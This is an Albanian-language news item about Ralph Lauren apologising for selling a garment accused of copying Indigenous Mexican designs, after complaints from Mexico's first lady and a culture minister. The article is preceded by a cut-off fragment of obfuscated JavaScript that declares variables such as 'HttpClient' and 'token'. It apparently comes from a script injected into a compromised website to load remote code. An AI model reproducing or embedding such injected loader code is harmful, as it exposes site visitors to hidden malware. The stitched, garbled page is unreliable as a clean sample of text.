;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Ralph Lauren akuzohet për plagjiaturë! Vjen reagimi i markës

By

Ralph Lauren ka kërkuar falje për shitjen e një artikulli që dyshohet se ka kopjuar dizajne indigjene meksikane.

Rrjeti amerikan i modës u akuzua për “plagjiaturë” nga gruaja e presidentit të vendit, Beatriz Gutiérrez, si dhe një ministre e kulturës.

Meksika ka drejtuar ankesa të ngjashme për markat e tjera të mëdha vitet e fundit.

Ralph Lauren tha se ishte “i habitur” kur e pa veshjen në fjalë ende në shitje, pasi kishte lëshuar një “direktivë të ashpër” muaj më parë për ta hequr atë.

Në një deklaratë, kompania e veshjeve tha se po punonte për të zbuluar se si produkti përfundoi në katin e shitjeve dhe se i vinte “thellësisht keq që ndodhi”.

Agjencia e lajmeve Reuters raportoi se gjeti të njëjtin artikull duke u shitur në internet për qindra dollarë./Prive.al

Artikuj të ngjashëm